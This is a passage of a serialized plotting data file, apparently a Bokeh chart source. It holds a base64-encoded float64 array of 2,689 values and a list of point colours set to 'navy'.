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PpIld0IAAKqBkiV3QgAA6MqSJXdCAACLGJMld0IAAM9gkyV3QgAAbK+TJXdCAICD9JMld0IAAIM9lCV3QgCAdoiUJXdCAACbyXwld0IAAPEOfSV3QgCAumB9JXdCAADYpH0ld0IAgFTufSV3QgAAVDd+JXdCAIAjiH4ld0IAAFPJfiV3QgAACBR/JXdCAABSW38ld0IAAHKpfyV3QgAAUe1/JXdCAABPwbcld0IAABAKuCV3QgAAeEy4JXdCAIAwjLgld0IAAJvYuCV3QgCAwkS5JXdCAIBUgLkld0IAgI21uSV3QgAAn/u5JXdCAADXRbold0IAALWeuiV3QgCA9ty6JXdCAADAmb4ld0IAgJXpviV3QgAAYCa/JXdCAAAtbb8ld0IAgCa3vyV3QgCA2hbAJXdCAACxUcAld0IAgDOawCV3QgCAa+TAJXdCAABfL8Eld0IAgHxzwSV3QgAA7b7BJXdCAAAmcq0ld0IAgDe4rSV3QgAADQiuJXdCAABvS64ld0IAAPSdriV3QgAAaN6uJXdCAAADV68ld0IAgId1ryV3QgAAmbuvJXdCAIAJB7Ald0IAgBdYsCV3QgAAYpKmJXdCAAAd3KYld0IAgLY1pyV3QgAAP32nJXdCAIAbt6cld0IAgOj9pyV3QgCAAk2oJXdCAIDDlagld0IAgDbrqCV3QgCAqiupJXdCAID6cakld0IAgEANqiV3QgCAkFOqJXdCAAC6laold0IAgELdqiV3QgCAhiWrJXdCAIBBb6sld0IAADW6qyV3QgAA9gKsJXdCAAD4Vawld0IAAN2YrCV3QgAAD+SsJXdCAABbFJUld0IAgFRelSV3QgCAULKVJXdCAACA85Uld0IAAE06liV3QgCAz4KWJXdCAABAzpYld0IAAJAUlyV3QgAAFWeXJXdCAICdrpcld0IAgO30lyV3QgCARXnFJXdCAICbvsUld0IAAKF7dCV3QgCANcF0JXdCAAAdDnUld0IAgIdadSV3QgAAFqF1JXdCAIDPS7Qld0IAABGKtCV3QgAA4+S0JXdCAACNHLUld0IAgN9stSV3QgAASrm1JXdCAIA2GrYld0IAgDlYtiV3QgCAxZS2JXdCAICq17Yld0IAgPQetyV3QgAAwATCJXdCAIDFTMIld0IAgK64wiV3QgAAYuTCJXdCAADEJ8Mld0IAAIVwwyV3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\",\"dtype\":\"float64\",\"shape\":[2689]},\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"